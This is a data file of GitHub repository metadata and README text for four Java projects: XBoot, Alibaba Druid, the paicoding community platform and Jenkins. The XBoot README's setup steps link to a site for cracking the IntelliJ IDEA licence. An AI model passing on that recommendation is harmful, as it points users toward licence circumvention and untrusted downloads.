Exrick/xboot,master,3779,1298,2018-04-23T14:44:18Z,5309,11,基于Spring Boot 2.x的一站式前后端分离快速开发平台XBoot 微信小程序+Uniapp 前端:Vue+iView Admin 后端:Spring Boot 2.x/Spring Security/JWT/JPA+Mybatis-Plus/Redis/Elasticsearch/Activiti 分布式限流/同步锁/验证码/SnowFlake雪花算法ID 动态权限 数据权限 工作流 代码生成 定时任务 社交账号 短信登录 单点登录 OAuth2开放平台 客服机器人 数据大屏 暗黑模式,activiti admin dark-mode dashboard elasticsearch iview jpa jwt mybatis-plus mysql oauth2 quartz redis spring-boot spring-security uniapp vue wechat-app xboot,"# XBoot
[![AUR](https://img.shields.io/badge/GPL-v3-red)](https://github.com/Exrick/xmall/blob/master/License)
[![](https://img.shields.io/badge/Author-Exrick-orange.svg)](http://blog.exrick.cn)
[![](https://img.shields.io/badge/version-3.3.4-brightgreen.svg)](https://github.com/Exrick/x-boot)
[![GitHub stars](https://img.shields.io/github/stars/Exrick/x-boot.svg?style=social&label=Stars)](https://github.com/Exrick/x-boot)
[![GitHub forks](https://img.shields.io/github/forks/Exrick/x-boot.svg?style=social&label=Fork)](https://github.com/Exrick/x-boot)
### 宣传视频
- [作者亲自制作XBoot文字快闪宣传视频](http://www.bilibili.com/av30284667)
- [作者亲自制作其他项目宣传视频](https://www.bilibili.com/video/av23121122/)
### 宣传官网
- 官网地址:http://xb.exrick.cn
- 官网源码:https://github.com/Exrick/xboot-show
### 在线Demo
- 在线Demo:http://xboot.exrick.cn
- 单点登录测试页:http://sso.exrick.cn
- 统一认证平台访问地址:http://xboot.exrick.cn/authorize
### 最新最全面在线文档
https://www.kancloud.cn/exrick/xboot/content
### 前台基于Vue+iView项目地址: [xboot-front](https://github.com/Exrick/xboot-front)
### 版本说明
- xboot-fast:单应用版本
- xboot-module:多模块版本
### 项目简介
- [x] 代码拥有详细注释 无复杂逻辑 核心使用 SpringBoot 2.4.8
- [x] JWT / 基于Redis可配置单设备登录Token交互 任意切换 提供开放平台、OAuth2认证中心 支持点单登录
- [x] JPA + Mybatis-Plus 任意切换
- [x] 操作日志记录方式任意切换Mysql或Elasticseach记录
- [x] Java、Vue、SQL代码生成效率翻四倍
- [x] 动态权限管理、多维度轻松控制权限按钮显示、数据权限管理
- [x] 支持社交账号、短信等多方式登录 不干涉原用户数据 实现第三方账号管理
- [x] 基于Websocket消息推送管理、基于Quartz定时任务管理、数据字典管理
- [x] 后台提供分布式限流、同步锁、验证码等工具类 前端提供丰富Vue模版
- [x] 可动态配置短信、邮件、Vaptcha验证码等
- [x] 为什么要前后端分离
- 都什么时代了还在用JQuery?
![](https://ooo.0o0.ooo/2019/04/29/5cc70cac4b7a4.png)
### 截图预览
- PC
![QQ截图20180826163917.png](https://ooo.0o0.ooo/2021/07/01/t6RXqn8LeaY5Nu1.png)
![QQ截图20180826164058.png](https://ooo.0o0.ooo/2021/07/01/TQZqrxog4ufX2SR.png)
![QQ截图20180826164144.png](https://ooo.0o0.ooo/2021/07/01/t7RdWhkbzZCawce.png)
- iPad Mini 5
- iPhone X
### [完整版截图细节展示](https://github.com/Exrick/x-boot/wiki/%E5%AE%8C%E6%95%B4%E7%89%88%E6%88%AA%E5%9B%BE%E7%BB%86%E8%8A%82%E5%B1%95%E7%A4%BA)
### 系统架构
### 前端所用技术
- Vue 2.6.x、Vue Cli 4.x、iView、iview-admin、iview-area、Vuex、Vue Router、ES6、webpack、axios、echarts、cookie等
- 前台为基于Vue+iView的独立项目请跳转至 [xboot-front](https://github.com/Exrick/xboot-front) 项目仓库查看
### 后端所用技术
##### 各框架依赖版本皆使用目前最新版本
- Spring Boot
- SpringMVC
- Spring Security
- [Spring Data JPA](https://docs.spring.io/spring-data/jpa/docs/2.2.2.RELEASE/reference/html/)
- [MyBatis-Plus](http://mp.baomidou.com):已更新至3.x版本
- [Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md)
- [Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md):基于Lucene分布式搜索引擎
- [Druid](http://druid.io/):阿里高性能数据库连接池(偏监控 注重性能可使用默认HikariCP) [Druid配置官方中文文档](https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter)
- [Json Web Token(JWT)](https://jwt.io/)
- [Quartz](http://www.quartz-scheduler.org):定时任务
- [Beetl](http://ibeetl.com/guide/#beetl):模版引擎 代码生成使用
- [Thymeleaf](https://www.thymeleaf.org/):发送模版邮件使用
- [Hutool](http://hutool.mydoc.io/):Java工具包
- [Jasypt](https://github.com/ulisesbocchio/jasypt-spring-boot):配置文件加密(thymeleaf作者开发)
- [Swagger2](https://github.com/Exrick/xmall/blob/master/study/Swagger2.md):Api文档生成
- MySQL
- [Nginx](https://github.com/Exrick/xmall/blob/master/study/Nginx.md)
- [Maven](https://github.com/Exrick/xmall/blob/master/study/Maven.md)
- 第三方SDK或服务
- [七牛云文件存储服务](https://developer.qiniu.com/kodo/sdk/1239/java)
- [腾讯位置服务](https://lbs.qq.com/webservice_v1/guide-ip.html):需申请填入key后免费使用
- 完整版
- [Vaptcha人机验证码](https://www.vaptcha.com/)
- [阿里云短信服务](https://dysms.console.aliyun.com)
- 其它开发工具
- [Lombok](https://projectlombok.org/)
- [JRebel](https://github.com/Exrick/xmall/blob/master/study/JRebel.md):开发秒级热部署
- [阿里JAVA开发规约插件](https://github.com/alibaba/p3c)
### 最新最全面在线文档
> 第一时间更新,文档永不收费
https://www.kancloud.cn/exrick/xboot/content
### 本地运行部署
- 安装依赖并启动:[Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md)、[Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md)(当配置使用ES记录日志时需要)
- [Maven安装和在IDEA中配置](https://github.com/Exrick/xmall/blob/master/study/Maven.md)
- 建议使用IDEA([破解/免费注册](http://idea.lanyus.com/)) 安装 `Lombok` 插件后导入该Maven项目 若未自动下载依赖请在根目录下执行 `mvn install` 命令
- MySQL数据库新建 `xboot` 数据库,配置文件已开启ddl自动生成表结构但无初始数据,请记得运行导入xboot.sql文件(当报错找不到Quartz相关表时请设置数据库忽略大小写或额外重新导入quartz.sql)
- 修改配置文件 `application.yml` 相应配置,其中有详细注释,所有配置只需在这里修改
- 编译器中启动运行 `XbootApplication.java` 或根目录下执行命令 `mvn spring-boot:run` 默认端口8888 访问接口文档 `http://localhost:8888/doc.html` 说明启动成功 管理员账密admin|123456
- 前台页面请启动基于Vue的 [xboot-front](https://github.com/Exrick/xboot-front) 项目,并修改其接口代理配置
> 温馨提示:若更新代码后报错,请记得更新sql并清空Redis缓存
### 开发指南及相关技术栈文档
- [项目基本配置和使用相关技术栈文档【必读】](https://github.com/Exrick/x-boot/wiki/%E9%A1%B9%E7%9B%AE%E5%9F%BA%E6%9C%AC%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8%E7%9B%B8%E5%85%B3%E6%8A%80%E6%9C%AF%E6%A0%88%E6%96%87%E6%A1%A3%E3%80%90%E5%BF%85%E8%AF%BB%E3%80%91)
- [如何使用XBoot后端在30秒内开发出增删改接口](https://github.com/Exrick/x-boot/wiki/%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8XBoot%E5%90%8E%E7%AB%AF%E5%9C%A830%E7%A7%92%E5%86%85%E5%BC%80%E5%8F%91%E5%87%BA%E5%A2%9E%E5%88%A0%E6%94%B9%E6%8E%A5%E5%8F%A3)
- [具体XBoot增删改文档示例](https://github.com/Exrick/x-boot/wiki/CRUD)
- 完整版
- [第三方社交账号登录配置](https://github.com/Exrick/x-boot/wiki/%E7%AC%AC%E4%B8%89%E6%96%B9%E7%A4%BE%E4%BA%A4%E8%B4%A6%E5%8F%B7%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE)
- [短信登录配置](https://github.com/Exrick/x-boot/wiki/%E7%9F%AD%E4%BF%A1%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE)
- [Vaptcha人机验证码配置使用](https://github.com/Exrick/x-boot/wiki/vaptcha%E4%BA%BA%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E9%85%8D%E7%BD%AE%E4%BD%BF%E7%94%A8)
- [Activiti工作流开发说明](https://github.com/Exrick/x-boot/wiki/Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E5%BC%80%E5%8F%91%E8%AF%B4%E6%98%8E)
### [分布式扩展](https://github.com/alibaba/dubbo-spring-boot-starter/blob/master/README_zh.md)
### XBoot后端学习分享(更新中)
1. [Spring Boot 2.x 区别总结](https://github.com/Exrick/x-boot/wiki/SpringBoot2.x%E5%8C%BA%E5%88%AB%E6%80%BB%E7%BB%93)
2. [Spring Security整合JWT](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E6%95%B4%E5%90%88JWT)
3. [Spring Security实现动态数据库权限管理](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E5%8A%A8%E6%80%81%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86)
4. [Spring Boot 2.x整合Quartz](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Quartz)
5. [基于Websocket实现发送消息后右上角消息图标红点实时显示](https://github.com/Exrick/x-boot/wiki/%E5%9F%BA%E4%BA%8EWebsocket%E5%AE%9E%E7%8E%B0%E5%8F%91%E9%80%81%E6%B6%88%E6%81%AF%E5%90%8E%E5%8F%B3%E4%B8%8A%E8%A7%92%E6%B6%88%E6%81%AF%E5%9B%BE%E6%A0%87%E7%BA%A2%E7%82%B9%E5%AE%9E%E6%97%B6%E6%98%BE%E7%A4%BA)
6. [Spring Boot 2.x整合Activiti工作流以及模型设计器](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E4%BB%A5%E5%8F%8A%E6%A8%A1%E5%9E%8B%E8%AE%BE%E8%AE%A1%E5%99%A8)
### Docker下后端集群部署(更新中)
> 前端集群部署请跳转至[xboot-front](https://github.com/Exrick/xboot-front)项目查看
1.[Docker的安装与常用命令](https://github.com/Exrick/x-boot/wiki/Docker%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4)
2.基于PXC架构Mysql数据库集群搭建
3.Redis集群搭建
4.Elasticsearch集群搭建
5.XBoot后端集群部署
### 商用授权
- 个人学习使用遵循GPL开源协议
- 商用需联系作者授权
### 作者其他项目推荐
- [XMall微信小程序APP前端 现已开源!](https://github.com/Exrick/xmall-weapp)
[![WX20190924-234416@2x.png](https://s2.ax1x.com/2019/10/06/ucEsBD.md.png)](https://www.bilibili.com/video/av70226175)
- [XMall:基于SOA架构的分布式电商购物商城](https://github.com/Exrick/xmall)
![](https://ooo.0o0.ooo/2018/07/22/5b54615b95788.jpg)
- [XPay个人免签收款支付系统](https://github.com/Exrick/xpay)
- 机器学习笔记
- [Machine-Learning](https://github.com/Exrick/Machine-Learning)
### 技术疑问交流
- QQ交流群 `475743731(付费)`,可获取各项目详细图文文档、疑问解答 [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=7b60cec12ba93ebed7568b0a63f22e6e034c0d1df33125ac43ed753342ec6ce7)
- 免费交流群 `562962309` [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=52f6003e230b26addeed0ba6cf343fcf3ba5d97829d17f5b8fa5b151dba7e842)
- 作者博客:[http://blog.exrick.cn](http://blog.exrick.cn)
### [捐赠](http://xpay.exrick.cn/pay)"
alibaba/druid,master,27622,8518,2011-11-03T05:12:51Z,83924,2160,阿里云计算平台DataWorks(https://help.aliyun.com/document_detail/137663.html) 团队出品,为监控而生的数据库连接池,,"# druid
[![Java CI](https://img.shields.io/github/actions/workflow/status/alibaba/druid/ci.yaml?branch=master&logo=github&logoColor=white)](https://github.com/alibaba/druid/actions/workflows/ci.yaml)
[![Codecov](https://img.shields.io/codecov/c/github/alibaba/druid/master?logo=codecov&logoColor=white)](https://codecov.io/gh/alibaba/druid/branch/master)
[![Maven Central](https://img.shields.io/maven-central/v/com.alibaba/druid?logo=apache-maven&logoColor=white)](https://search.maven.org/artifact/com.alibaba/druid)
[![Last SNAPSHOT](https://img.shields.io/nexus/snapshots/https/oss.sonatype.org/com.alibaba/druid?label=latest%20snapshot)](https://oss.sonatype.org/content/repositories/snapshots/com/alibaba/druid/)
[![GitHub release](https://img.shields.io/github/release/alibaba/druid)](https://github.com/alibaba/druid/releases)
[![License](https://img.shields.io/github/license/alibaba/druid?color=4D7A97&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0.html)
Introduction
---
- git clone https://github.com/alibaba/druid.git
- cd druid && mvn install
- have fun.
# 相关阿里云产品
* [DataWorks数据集成](https://help.aliyun.com/document_detail/137663.html) ![DataWorks](https://github.com/alibaba/druid/raw/master/doc/dataworks_datax.png)
Documentation
---
- 中文 https://github.com/alibaba/druid/wiki/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98
- English https://github.com/alibaba/druid/wiki/FAQ
- Druid Spring Boot Starter https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter
"
itwanger/paicoding,main,1634,324,2022-07-06T12:43:21Z,15426,13,⭐️一款好用又强大的开源社区,基于 Spring Boot、MyBatis-Plus、MySQL、Redis、ElasticSearch、MongoDB、Docker、RabbitMQ 等主流技术栈,附详细教程,包括Java、Spring、MySQL、Redis、微服务&分布式、消息队列等核心知识点。学编程,就上技术派😁。,java mybatis mysql redis spring springboot,"
一个基于 Spring Boot、MyBatis-Plus、MySQL、Redis、ElasticSearch、MongoDB、Docker、RabbitMQ 等技术栈实现的社区系统,采用主流的互联网技术架构、全新的UI设计、支持一键源码部署,拥有完整的文章&教程发布/搜索/评论/统计流程等,代码完全开源,没有任何二次封装,是一个非常适合二次开发/实战的现代化社区项目👍 。
## 一、配套服务
1. **技术派网址**:[https://paicoding.com](https://paicoding.com)
2. **技术派教程**:[https://paicoding.com/column](https://paicoding.com/column) 目前已更新高并发手册、JVM 手册、Java 并发编程手册、二哥的 Java 进阶之路,以及技术派部分免费教程。我们的宗旨是:**学编程,就上技术派**😁
3. **技术派管理端源码**:[paicoding-admin](https://github.com/itwanger/paicoding-admin)
4. **技术派专属学习圈子**:[不走弯路,少采坑,附 120 篇技术派全套教程](https://paicoding.com/article/detail/17)
5. **派聪明AI助手**:AI 时代,怎能掉队,欢迎体验 [技术派的派聪明 AI 助手](https://paicoding.com/chat)
6. **码云仓库**:[https://gitee.com/itwanger/paicoding](https://gitee.com/itwanger/paicoding) (国内访问速度更快)
## 二、项目介绍
### 项目演示
#### 前台社区系统
- 项目仓库(GitHub):[https://github.com/itwanger/paicoding](https://github.com/itwanger/paicoding)
- 项目仓库(码云):[https://gitee.com/itwanger/paicoding](https://gitee.com/itwanger/paicoding)
- 项目演示地址:[https://paicoding.com](https://paicoding.com)
![](https://cdn.tobebetterjavaer.com/images/20230602/d7d341c557e7470d9fb41245e5bb4209.png)
#### 后台社区系统
- 项目仓库(GitHub):[https://github.com/itwanger/paicoding-admin](https://github.com/itwanger/paicoding-admin)
- 项目仓库(码云):[https://gitee.com/itwanger/paicoding-admin](https://gitee.com/itwanger/paicoding-admin)
- 项目演示地址:[https://paicoding.com/admin-view](https://paicoding.com/admin/)
![](https://cdn.tobebetterjavaer.com/images/20230602/83139e13a4784c0fbf0adedd8e287c5b.png)
#### 代码展示
![](https://cdn.tobebetterjavaer.com/images/20231205/b8f76cb8e09f4ebca84b3ddd3b61c13e.png)
### 架构图
#### 系统架构图
![](https://cdn.tobebetterjavaer.com/paicoding/3da165adfcad0f03d40e13e941ed4afb.png)
#### 业务架构图
![](https://cdn.tobebetterjavaer.com/paicoding/main/paicoding-business.jpg)
### 组织结构
```
paicoding
├── paicoding-api -- 定义一些通用的枚举、实体类,定义 DO\DTO\VO 等
├── paicoding-core -- 核心工具/组件相关模块,如工具包 util, 通用的组件都放在这个模块(以包路径对模块功能进行拆分,如搜索、缓存、推荐等)
├── paicoding-service -- 服务模块,业务相关的主要逻辑,DB 的操作都在这里
├── paicoding-ui -- HTML 前端资源(包括 JavaScript、CSS、Thymeleaf 等)
├── paicoding-web -- Web模块、HTTP入口、项目启动入口,包括权限身份校验、全局异常处理等
```
#### 环境配置说明
资源配置都放在 `paicoding-web` 模块的资源路径下,通过maven的env进行环境选择切换
当前提供了四种开发环境
- resources-env/dev: 本地开发环境,也是默认环境
- resources-env/test: 测试环境
- resources-env/pre: 预发环境
- resources-env/prod: 生产环境
环境切换命令
```bash
# 如切换生产环境
mvn clean install -DskipTests=true -Pprod
```
#### 配置文件说明
- resources
- application.yml: 主配置文件入口
- application-config.yml: 全局的站点信息配置文件
- logback-spring.xml: 日志打印相关配置文件
- liquibase: 由liquibase进行数据库表结构管理
- resources-env
- xxx/application-dal.yml: 定义数据库相关的配置信息
- xxx/application-image.yml: 定义上传图片的相关配置信息
- xxx/application-web.yml: 定义web相关的配置信息
#### [前端工程结构说明](docs/前端工程结构说明.md)
### 技术选型
后端技术栈
| 技术 | 说明 | 官网 |
|:-------------------:|----------------------|----------------------------------------------------------------------------------------------------|
| Spring & SpringMVC | Java全栈应用程序框架和WEB容器实现 | [https://spring.io/](https://spring.io/) |
| SpringBoot | Spring应用简化集成开发框架 | [https://spring.io/projects/spring-boot](https://spring.io/projects/spring-boot) |
| mybatis | 数据库orm框架 | [https://mybatis.org](https://mybatis.org) |
| mybatis-plus | 数据库orm框架 | [https://baomidou.com/](https://baomidou.com/) |
| mybatis PageHelper | 数据库翻页插件 | [https://github.com/pagehelper/Mybatis-PageHelper](https://github.com/pagehelper/Mybatis-PageHelper) |
| elasticsearch | 近实时文本搜索 | [https://www.elastic.co/cn/elasticsearch/service](https://www.elastic.co/cn/elasticsearch/service) |
| redis | 内存数据存储 | [https://redis.io](https://redis.io) |
| rabbitmq | 消息队列 | [https://www.rabbitmq.com](https://www.rabbitmq.com) |
| mongodb | NoSql数据库 | [https://www.mongodb.com/](https://www.mongodb.com/) |
| nginx | 服务器 | [https://nginx.org](https://nginx.org) |
| docker | 应用容器引擎 | [https://www.docker.com](https://www.docker.com) |
| hikariCP | 数据库连接 | [https://github.com/brettwooldridge/HikariCP](https://github.com/brettwooldridge/HikariCP) |
| oss | 对象存储 | [https://help.aliyun.com/document_detail/31883.html](https://help.aliyun.com/document_detail/31883.html) |
| https | 证书 | [https://letsencrypt.org/](https://letsencrypt.org/) |
| jwt | jwt登录 | [https://jwt.io](https://jwt.io) |
| lombok | Java语言增强库 | [https://projectlombok.org](https://projectlombok.org) |
| guava | google开源的java工具集 | [https://github.com/google/guava](https://github.com/google/guava) |
| thymeleaf | html5模板引擎 | [https://www.thymeleaf.org](https://www.thymeleaf.org) |
| swagger | API文档生成工具 | [https://swagger.io](https://swagger.io) |
| hibernate-validator | 验证框架 | [hibernate.org/validator/](hibernate.org/validator/) |
| quick-media | 多媒体处理 | [https://github.com/liuyueyi/quick-media](https://github.com/liuyueyi/quick-media) |
| liquibase | 数据库版本管理 | [https://www.liquibase.com](https://www.liquibase.com) |
| jackson | json/xml处理 | [https://www.jackson.com](https://www.jackson.com) |
| ip2region | ip地址 | [https://github.com/zoujingli/ip2region](https://github.com/zoujingli/ip2region) |
| websocket | 长连接 | [https://docs.spring.io/spring/reference/web/websocket.html](https://docs.spring.io/spring/reference/web/websocket.html) |
| sensitive-word | 敏感词 | [https://github.com/houbb/sensitive-word](https://github.com/houbb/sensitive-word) |
| chatgpt | chatgpt | [https://openai.com/blog/chatgpt](https://openai.com/blog/chatgpt) |
| 讯飞星火 | 讯飞星火大模型 | [https://www.xfyun.cn/doc/spark/Web.html](https://www.xfyun.cn/doc/spark/Web.html#_1-%E6%8E%A5%E5%8F%A3%E8%AF%B4%E6%98%8E) |
## 三、技术派教程
技术派教程共 120+ 篇,从中整理出 20 篇,供大家免费学习。
- [(🌟 新人必看)技术派系统架构&功能模块一览](https://paicoding.com/article/detail/15)
- [(🌟 新人必看)小白如何学习技术派](https://paicoding.com/article/detail/366)
- [(🌟 新人必看)如何将技术派写入简历](https://paicoding.com/article/detail/373)
- [(🌟 新人必看)技术派架构方案设计](https://paicoding.com/column/6/5)
- [(🌟 新人必看)技术派技术方案设计](https://paicoding.com/article/detail/208)
- [(🌟 新人必看)技术派项目管理流程](https://paicoding.com/article/detail/445)
- [(🌟 新人必看)技术派MVC分层架构](https://paicoding.com/article/detail/446)
- [(🌟 新人必看)技术派项目工程搭建手册](https://paicoding.com/article/detail/459)
- [(👍 强烈推荐)技术派微信公众号自动登录](https://paicoding.com/article/detail/448)
- [(👍 强烈推荐)技术派微信扫码登录实现](https://paicoding.com/article/detail/453)
- [(👍 强烈推荐)技术派Session/Cookie身份验证识别](https://paicoding.com/article/detail/449)
- [(👍 强烈推荐)技术派Mysql/Redis缓存一致性](https://paicoding.com/column/6/3)
- [(👍 强烈推荐)技术派Redis实现用户活跃排行榜](https://paicoding.com/article/detail/454)
- [(👍 强烈推荐)技术派消息队列RabbitMQ](https://paicoding.com/column/6/2)
- [(👍 强烈推荐)技术派消息队列RabbitMQ连接池](https://paicoding.com/column/6/1)
- [(👍 强烈推荐)技术派消息队列Kafka](https://paicoding.com/article/detail/460)
- [(👍 强烈推荐)技术派Cancal实现MySQL和ES同步](https://paicoding.com/column/6/8)
- [(👍 强烈推荐)技术派ES实现查询](https://paicoding.com/article/detail/341)
- [(👍 强烈推荐)技术派定时任务实现](https://paicoding.com/article/detail/457)
- [(👍 扬帆起航)送给坚持到最后的自己,一起杨帆起航](https://paicoding.com/article/detail/447)
## 四、环境搭建
### 开发工具
| 工具 | 说明 | 官网 |
|:----------------:|--------------|--------------------------------------------------------------------------------------------------------------|
| IDEA | java开发工具 | [https://www.jetbrains.com](https://www.jetbrains.com) |
| Webstorm | web开发工具 | [https://www.jetbrains.com/webstorm](https://www.jetbrains.com/webstorm) |
| Chrome | 浏览器 | [https://www.google.com/intl/zh-CN/chrome](https://www.google.com/intl/zh-CN/chrome) |
| ScreenToGif | gif录屏 | [https://www.screentogif.com](https://www.screentogif.com) |
| SniPaste | 截图 | [https://www.snipaste.com](https://www.snipaste.com) |
| PicPick | 图片处理工具 | [https://picpick.app](https://picpick.app) |
| MarkText | markdown编辑器 | [https://github.com/marktext/marktext](https://github.com/marktext/marktext) |
| curl | http终端请求 | [https://curl.se](https://curl.se) |
| Postman | API接口调试 | [https://www.postman.com](https://www.postman.com) |
| draw.io | 流程图、架构图绘制 | [https://www.diagrams.net/](https://www.diagrams.net/) |
| Axure | 原型图设计工具 | [https://www.axure.com](https://www.axure.com) |
| navicat | 数据库连接工具 | [https://www.navicat.com](https://www.navicat.com) |
| DBeaver | 免费开源的数据库连接工具 | [https://dbeaver.io](https://dbeaver.io) |
| iTerm2 | mac终端 | [https://iterm2.com](https://iterm2.com) |
| windows terminal | win终端 | [https://learn.microsoft.com/en-us/windows/terminal/install](https://learn.microsoft.com/en-us/windows/terminal/install) |
| SwitchHosts | host管理 | [https://github.com/oldj/SwitchHosts/releases](https://github.com/oldj/SwitchHosts/releases) |
### 开发环境
| 工具 | 版本 | 下载 |
|:-------------:|:----------|------------------------------------------------------------------------------------------------------------------------|
| jdk | 1.8+ | [https://www.oracle.com/java/technologies/downloads/#java8](https://www.oracle.com/java/technologies/downloads/#java8) |
| maven | 3.4+ | [https://maven.apache.org/](https://maven.apache.org/) |
| mysql | 5.7+/8.0+ | [https://www.mysql.com/downloads/](https://www.mysql.com/downloads/) |
| redis | 5.0+ | [https://redis.io/download/](https://redis.io/download/) |
| elasticsearch | 8.0.0+ | [https://www.elastic.co/cn/downloads/elasticsearch](https://www.elastic.co/cn/downloads/elasticsearch) |
| nginx | 1.10+ | [https://nginx.org/en/download.html](https://nginx.org/en/download.html) |
| rabbitmq | 3.10.14+ | [https://www.rabbitmq.com/news.html](https://www.rabbitmq.com/news.html) |
| ali-oss | 3.15.1 | [https://help.aliyun.com/document_detail/31946.html](https://help.aliyun.com/document_detail/31946.html) |
| git | 2.34.1 | [http://github.com/](http://github.com/) |
| docker | 4.10.0+ | [https://docs.docker.com/desktop/](https://docs.docker.com/desktop/) |
| let's encrypt | https证书 | [https://letsencrypt.org/](https://letsencrypt.org/) |
### 搭建步骤
#### 本地部署教程
> [本地开发环境手把手教程](docs/本地开发环境配置教程.md)
### 云服务器部署教程
> [环境搭建 & 基于源码的部署教程](docs/安装环境.md)
> [服务器启动教程](docs/服务器启动教程.md)
## 五、友情链接
- [toBeBetterjavaer](https://github.com/itwanger/toBeBetterJavaer) :一份通俗易懂、风趣幽默的Java学习指南,内容涵盖Java基础、Java并发编程、Java虚拟机、Java企业级开发、Java面试等核心知识点。学Java,就认准二哥的Java进阶之路😄
- [paicoding-admin](https://github.com/itwanger/paicoding-admin) :🚀🚀🚀 paicoding-admin,技术派管理端,基于 React18、React-Router v6、React-Hooks、Redux、TypeScript、Vite3、Ant-Design 5.x、Hook Admin、ECharts 的一套社区管理系统,够惊艳哦。
## 六、鸣谢
技术派收到了 [Jetbrains](https://jb.gg/OpenSourceSupport) 多份 Licenses(详情戳 [这里](https://paicoding.com/article/detail/331) ),并已分配给项目 [活跃开发者](https://github.com/itwanger/paicoding/graphs/contributors) ,非常感谢 Jetbrains 对开源社区的支持。
![JetBrains Logo (Main) logo](https://resources.jetbrains.com/storage/products/company/brand/logos/jb_beam.svg)
## 七、star 趋势图
[![Star History Chart](https://api.star-history.com/svg?repos=itwanger/paicoding&type=Date)](https://star-history.com/#itwanger/paicoding&Date)
## 八、公众号
GitHub 上标星 10000+ 的开源知识库《 [二哥的 Java 进阶之路](https://github.com/itwanger/toBeBetterJavaer) 》第一版 PDF 终于来了!包括Java基础语法、数组&字符串、OOP、集合框架、Java IO、异常处理、Java 新特性、网络编程、NIO、并发编程、JVM等等,共计 32 万余字,可以说是通俗易懂、风趣幽默……详情戳:[太赞了,GitHub 上标星 8700+ 的 Java 教程](https://javabetter.cn/overview/)
微信搜 **沉默王二** 或扫描下方二维码关注二哥的原创公众号,回复 **222** 即可免费领取。
![](https://cdn.tobebetterjavaer.com/tobebetterjavaer/images/gongzhonghao.png)
## 九、许可证
[Apache License 2.0](https://github.com/itwanger/paicoding/edit/main/README.md)
Copyright (c) 2022-2023 技术派(楼仔、沉默王二、一灰、小超)
"
jenkinsci/jenkins,master,22361,8513,2010-11-22T21:21:23Z,157677,73,Jenkins automation server,cicd continuous-delivery continuous-deployment continuous-integration devops groovy hacktoberfest java jenkins pipelines-as-code,"
# About
[![Jenkins Regular Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog%2Fbadge.json)](https://www.jenkins.io/changelog)
[![Jenkins LTS Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog-stable%2Fbadge.json)](https://www.jenkins.io/changelog-stable)
[![Docker Pulls](https://img.shields.io/docker/pulls/jenkins/jenkins.svg)](https://hub.docker.com/r/jenkins/jenkins/)
[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/3538/badge)](https://bestpractices.coreinfrastructure.org/projects/3538)
[![Gitter](https://img.shields.io/gitter/room/jenkinsci/jenkins)](https://app.gitter.im/#/room/#jenkinsci_jenkins:gitter.im)
In a nutshell, Jenkins is the leading open-source automation server.
Built with Java, it provides over 1,800 [plugins](https://plugins.jenkins.io/) to support automating virtually anything,
so that humans can spend their time doing things machines cannot.
# What to Use Jenkins for and When to Use It
Use Jenkins to automate your development workflow, so you can focus on work that matters most. Jenkins is commonly used for:
- Building projects
- Running tests to detect bugs and other issues as soon as they are introduced
- Static code analysis
- Deployment
Execute repetitive tasks, save time, and optimize your development process with Jenkins.
# Downloads
The Jenkins project provides official distributions as WAR files, Docker images, native packages and installers for platforms including several Linux distributions and Windows.
See the [Downloads](https://www.jenkins.io/download) page for references.
For all distributions Jenkins offers two release lines:
- [Weekly](https://www.jenkins.io/download/weekly/) -
Frequent releases which include all new features, improvements, and bug fixes.
- [Long-Term Support (LTS)](https://www.jenkins.io/download/lts/) -
Older release line which gets periodically updated via bug fix backports.
Latest releases:
[![Jenkins Regular Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog%2Fbadge.json)](https://www.jenkins.io/changelog)
[![Jenkins LTS Release](https://img.shields.io/endpoint?url=https%3A%2F%2Fwww.jenkins.io%2Fchangelog-stable%2Fbadge.json)](https://www.jenkins.io/changelog-stable)
# Source
Our latest and greatest source of Jenkins can be found on [GitHub](https://github.com/jenkinsci/jenkins). Fork us!
# Contributing to Jenkins
Follow the [contributing guidelines](CONTRIBUTING.md) if you want to propose a change in the Jenkins core.
For more information about participating in the community and contributing to the Jenkins project,
see [this page](https://www.jenkins.io/participate/).
Documentation for Jenkins core maintainers is in the [maintainers guidelines](docs/MAINTAINERS.adoc).
# News and Website
All information about Jenkins can be found on our [website](https://www.jenkins.io/).
Follow us on [Twitter](https://twitter.com/jenkinsci) or [LinkedIn](https://www.linkedin.com/company/jenkins-project/).
# Governance
See the [Jenkins Governance Document](https://www.jenkins.io/project/governance/) for information about the project's open governance, our philosophy and values, and development practices.
Jenkins Code of Conduct can be found [here](https://www.jenkins.io/project/conduct/).
# Adopters
Jenkins is used by millions of users and thousands of companies.
See [adopters](https://www.jenkins.io/project/adopters/) for the list of Jenkins adopters and their success stories.
# License
Jenkins is **licensed** under the **[MIT License](LICENSE.txt)**.
"
